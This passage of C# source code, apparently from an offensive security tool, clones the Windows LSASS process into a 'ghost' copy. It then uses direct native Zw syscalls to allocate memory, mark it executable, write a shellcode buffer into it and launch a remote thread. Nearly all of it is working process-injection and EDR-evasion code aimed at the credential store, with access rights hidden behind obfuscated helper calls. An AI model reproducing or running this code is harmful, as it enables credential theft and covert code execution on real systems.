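            OSVERSIONINFOEXW osVersionInfo = new OSVERSIONINFOEXW { dwOSVersionInfoSize = Marshal.SizeOf(typeof(OSVERSIONINFOEXW)) };
            RtlGetVersion(ref osVersionInfo);

            OBJECT_ATTRIBUTES ObjAttr = new OBJECT_ATTRIBUTES
            {
                Length = (ulong)Marshal.SizeOf(typeof(OBJECT_ATTRIBUTES)),
                RootDirectory = IntPtr.Zero,
                ObjectName = IntPtr.Zero,
                Attributes = 0x00000020, // OBJ_EXCLUSIVE
                SecurityDescriptor = IntPtr.Zero,
                SecurityQualityOfService = IntPtr.Zero
            };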
1148 | 1149 | int ProcId = FindClonedProcess("lsass.exe"); 1150 | 1151 | Process targetProcess = Process.GetProcessById( ProcId ); 1152 | CLIENT_ID clientid = new CLIENT_ID(); 1153 | clientid.UniqueThread = new IntPtr(targetProcess.Threads[0].Id); 1154 | clientid.UniqueProcess = new IntPtr(targetProcess.Id); 1155 | IntPtr procHandle = (IntPtr)clientid.UniqueProcess; 1156 | 1157 | ZwOpenProcess( out procHandle, ProcessAccessFlags.All, new OBJECT_ATTRIBUTES(), ref clientid, ref osVersionInfo ); 1158 | 1159 | IntPtr ProcessHandle = IntPtr.Zero; 1160 | ZwCreateProcess( out ProcessHandle, ACCESS_MASK.GENERIC_ALL, ObjAttr, procHandle, true, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref osVersionInfo ); 1161 | 1162 | clientid.UniqueThread = IntPtr.Zero; // At this time there exist no thread in our ghost LSASS process, so this must be Zero. 1163 | clientid.UniqueProcess = new IntPtr(ProcId); 1164 | 1165 | IntPtr ptrToGhostLSASS = IntPtr.Zero; 1166 | ZwOpenProcess( out ptrToGhostLSASS, ProcessAccessFlags.All, new OBJECT_ATTRIBUTES(), ref clientid, ref osVersionInfo ); 1167 | 1168 | IntPtr allocMemAddress = new IntPtr(); 1169 | IntPtr scodeSize = (IntPtr)(UInt32)scode.Length; 1170 | 1171 | // Allocate memory without RWX 1172 | ZwAllocateVirtualMemory( ptrToGhostLSASS, ref allocMemAddress, new IntPtr(0), ref scodeSize, 0x1000 | 0x2000, 0x10, ref osVersionInfo ); 1173 | 1174 | // Change allocated memory to RWX 1175 | UInt32 BytesWritten = 0; 1176 | ZwProtectVirtualMemory( ptrToGhostLSASS, ref allocMemAddress, ref scodeSize, (UInt32)ReturnRight(), ref BytesWritten, ref osVersionInfo ); 1177 | 1178 | IntPtr bytesWritten = IntPtr.Zero; 1179 | IntPtr uPtr = Marshal.AllocHGlobal(scode.Length); 1180 | Marshal.Copy(scode, 0, uPtr, scode.Length); 1181 | ZwWriteVirtualMemory( ptrToGhostLSASS, ref allocMemAddress, uPtr, (UInt32)(scodeSize), ref bytesWritten, ref osVersionInfo ); 1182 | Marshal.FreeHGlobal(uPtr); 1183 | 1184 | IntPtr hRemoteThread = IntPtr.Zero; 1185 | ZwCreateThreadEx( out 
hRemoteThread, (UInt32)ReturnUpper(), IntPtr.Zero, ptrToGhostLSASS, allocMemAddress, IntPtr.Zero, 0, 0, 0, 0, IntPtr.Zero, ref osVersionInfo ); 1186 | 1187 | ZwClose(procHandle, ref osVersionInfo); 1188 | ZwClose(ProcessHandle, ref osVersionInfo); 1189 | ZwClose(ptrToGhostLSASS, ref osVersionInfo); 1190 | ZwClose(hRemoteThread, ref osVersionInfo); 1191 | } 1192 | } 1193 | } 1194 | --------------------------------------------------------------------------------